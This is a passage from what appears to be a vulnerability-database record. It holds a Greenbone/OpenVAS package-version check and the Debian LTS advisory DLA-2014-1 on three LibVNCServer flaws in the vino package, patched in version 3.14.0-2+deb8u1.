SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892014\");\n script_version(\"2019-11-30T03:00:09+0000\");\n script_cve_id(\"CVE-2014-6053\", \"CVE-2018-7225\", \"CVE-2019-15681\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/11/msg00032.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2014-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/945784\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'vino'\n package(s) announced via the DSA-2014-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\nThe rfbProcessClientNormalMessage function in\nlibvncserver/rfbserver.c in LibVNCServer did not properly handle\nattempts to send a large amount of ClientCutText data, which allowed\nremote attackers to cause a denial of service (memory consumption or\ndaemon crash) via a crafted message that was processed by using a\nsingle unchecked malloc.\n\nCVE-2018-7225\n\nAn issue was discovered in LibVNCServer.\nrfbProcessClientNormalMessage() in rfbserver.c did not sanitize\nmsg.cct.length, leading to access to uninitialized and potentially\nsensitive data or possibly unspecified other impact (e.g., an integer\noverflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\nLibVNC contained a memory leak (CWE-655) in VNC server code, which\nallowed an attacker to read stack memory and could be abused for\ninformation disclosure. Combined with another vulnerability, it could\nbe used to leak stack memory and bypass ASLR. This attack appeared to\nbe exploitable via network connectivity.\");\n\n script_tag(name:\"affected\", value:\"'vino' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"vino\", ver:\"3.14.0-2+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-11-29T22:14:35", "bulletinFamily": "unix", "description": "Package : vino\nVersion : 3.14.0-2+deb8u1\nCVE ID : CVE-2014-6053 CVE-2018-7225 CVE-2019-15681\nDebian Bug : 945784\n\n\nSeveral vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\n The rfbProcessClientNormalMessage function in\n libvncserver/rfbserver.c in LibVNCServer did not properly handle\n attempts to send a large amount of ClientCutText data, which allowed\n remote attackers to cause a denial of service (memory consumption or\n daemon crash) via a crafted message that was processed by using a\n single unchecked malloc.\n\nCVE-2018-7225\n\n An issue was discovered in LibVNCServer.\n rfbProcessClientNormalMessage() in rfbserver.c did not sanitize\n msg.cct.length, leading to access to uninitialized and potentially\n sensitive data or possibly unspecified other impact (e.g., an integer\n overflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\n LibVNC contained a memory leak (CWE-655) in VNC server code, which\n allowed an attacker to read stack memory and could be abused for\n information disclosure. Combined with another vulnerability, it could\n be used to leak stack memory and bypass ASLR. This attack appeared to\n be exploitable via network connectivity.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-11-29T08:31:28", "published": "2019-11-29T08:31:28", "id": "DEBIAN:DLA-2014-1:AEDFD", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201911/msg00032.html", "title": "[SECURITY] [DLA 2014-1] vino security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
